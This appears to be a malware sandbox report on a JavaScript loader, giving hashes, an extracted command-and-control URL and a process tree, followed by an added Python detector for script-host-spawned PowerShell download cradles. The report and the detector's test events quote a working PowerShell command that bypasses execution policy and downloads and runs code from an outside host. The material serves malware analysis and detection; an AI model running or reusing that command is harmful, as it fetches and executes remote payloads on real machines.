Analysis
max time kernel: 120s
max time network: 124s
platform: windows7_x64
resource: win7-20231215-en
resource tags: arch:x64, arch:x86, image:win7-20231215-en, locale:en-us, os:windows7-x64, system
submitted: 08-02-2024 14:25
Static task: static1
Behavioral task: behavioral1 (sample DCS7727723772772.js, resource win7-20231215-en)
Behavioral task: behavioral2 (sample DCS7727723772772.js, resource win10v2004-20231215-en)
General
Target: DCS7727723772772.js
Size: 25KB
MD5: fa4c5428813c2612116ac59af1862bcb
SHA1: 50f324f71e12473644eefa338b11dd347d713f68
SHA256: 8603c3e9cbbf9629724d1d4299418be0d2ad7ce04ea8091fc0bead7430d21fbd
SHA512: a770e57adc93505fbf7ccc4152ebc7985839e168770c16697f3b5d5f1ccd85ac5c1b641a7b407d53a727b2fcad33d123b930cc9ad13ba89c113c6809fbaccdb8
SSDEEP: 768:MleSnV5r8Fi+tVxfS0fy8hghu28Iswykn5d0B/PK3py1XY4TgVzlqIDG3ZBoxPg0:eeaV5oIhzPRZxehtM
Malware Config
Extracted
https://assime.ca/command.php
Signatures
Blocklisted process makes network request (2 IoCs)
- flow 5, PID 2836, powershell.exe
- flow 6, PID 2836, powershell.exe
Enumerates physical storage devices (1 TTP)
- Attempts to interact with connected storage/optical drive(s).
Suspicious behavior: EnumeratesProcesses (1 IoC)
- PID 2836, powershell.exe
Suspicious use of AdjustPrivilegeToken (1 IoC)
- Token: SeDebugPrivilege, PID 2836, powershell.exe
Suspicious use of WriteProcessMemory (3 IoCs)
- PID 1936 (wscript.exe) wrote to memory of PID 2836 (powershell.exe)
- PID 1936 (wscript.exe) wrote to memory of PID 2836 (powershell.exe)
- PID 1936 (wscript.exe) wrote to memory of PID 2836 (powershell.exe)
Processes
1. C:\Windows\system32\wscript.exe (PID 1936)
   Command line: wscript.exe C:\Users\Admin\AppData\Local\Temp\DCS7727723772772.js
   - Suspicious use of WriteProcessMemory
   2. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2836, child of PID 1936)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-Expression (New-Object Net.WebClient).DownloadString('https://assime.ca/command.php')"
      - Blocklisted process makes network request
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
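The process tree is the entire chain the sandbox captured: the JavaScript file runs under wscript.exe, which spawns powershell.exe with -ExecutionPolicy Bypass and -NoProfile and an Invoke-Expression download cradle that fetches https://assime.ca/command.php and executes the response as PowerShell. The explicit TLS 1.2 setting is there so the cradle still works on older .NET defaults such as Windows 7's, where WebClient would otherwise offer only TLS 1.0 and the download would fail. The second stage itself is not on this page, so the report describes only the loader. The detection logic below is an added example and not part of the sandbox report: it runs a parent/child plus command-line check over process-creation events constructed to mirror the report (PID 1936 wscript.exe, PID 2836 powershell.exe with the command line shown above) together with one constructed benign control. The event schema, the script-host list, the score threshold and the invented PIDs 1200 and 3100 are assumptions of the example.

```python
# Added example (not part of the sandbox report): flag a script host spawning a
# PowerShell download cradle, as in the wscript.exe -> powershell.exe tree above.
import re
from dataclasses import dataclass
from urllib.parse import urlparse


@dataclass
class ProcEvent:
    """Minimal process-creation record; the field set is this example's assumption."""
    pid: int
    ppid: int
    image: str
    cmdline: str


# Constructed events mirroring the report: PID 1936 wscript.exe -> PID 2836
# powershell.exe. PID 1200 (parent of wscript.exe) and the benign control event
# PID 3100 are invented for the example.
EVENTS = [
    ProcEvent(1936, 1200, r"C:\Windows\system32\wscript.exe",
              r"wscript.exe C:\Users\Admin\AppData\Local\Temp\DCS7727723772772.js"),
    ProcEvent(2836, 1936, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-Expression (New-Object Net.WebClient).DownloadString('https://assime.ca/command.php')"'''),
    ProcEvent(3100, 1200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1"),
]

# Indicator taken from the report's "Malware Config / Extracted" section.
EXTRACTED_URLS = {"https://assime.ca/command.php"}

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}  # assumed parent list
# PowerShell accepts abbreviated switches, so match -ep / -exec / -ExecutionPolicy.
BYPASS_RE = re.compile(r"-e[px]\w*\s+bypass", re.I)
IEX_RE = re.compile(r"\b(invoke-expression|iex)\b", re.I)
DOWNLOAD_RE = re.compile(r"\.downloadstring\s*\(", re.I)
URL_RE = re.compile(r"https?://[^\s'\"()]+", re.I)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze(events):
    """Return one finding per powershell.exe event that shows at least two of:
    a script-host parent, an execution-policy bypass, an IEX+DownloadString cradle.
    The threshold of two is an assumption chosen to tolerate a missing parent record."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        if basename(e.image) != "powershell.exe":
            continue
        parent = by_pid.get(e.ppid)
        reasons = []
        if parent is not None and basename(parent.image) in SCRIPT_HOSTS:
            reasons.append(f"parent is script host {basename(parent.image)}")
        if BYPASS_RE.search(e.cmdline):
            reasons.append("execution policy bypass")
        if IEX_RE.search(e.cmdline) and DOWNLOAD_RE.search(e.cmdline):
            reasons.append("IEX download cradle")
        if len(reasons) < 2:
            continue
        urls = URL_RE.findall(e.cmdline)
        findings.append({
            "pid": e.pid,
            "parent_pid": e.ppid,
            "reasons": reasons,
            "urls": urls,
            "hosts": [urlparse(u).hostname for u in urls],
            "matches_extracted_config": any(u in EXTRACTED_URLS for u in urls),
        })
    return findings


if __name__ == "__main__":
    for finding in analyze(EVENTS):
        print(finding)
```

The four ProcEvent fields map directly onto the ProcessId, ParentProcessId, Image and CommandLine fields of a Sysmon Event ID 1 record, so the same logic can be fed real telemetry once a parser for that source is added. The URL extracted from the command line is compared against the report's extracted indicator so that a hit on the same loader, even with a different parent, still carries the attribution.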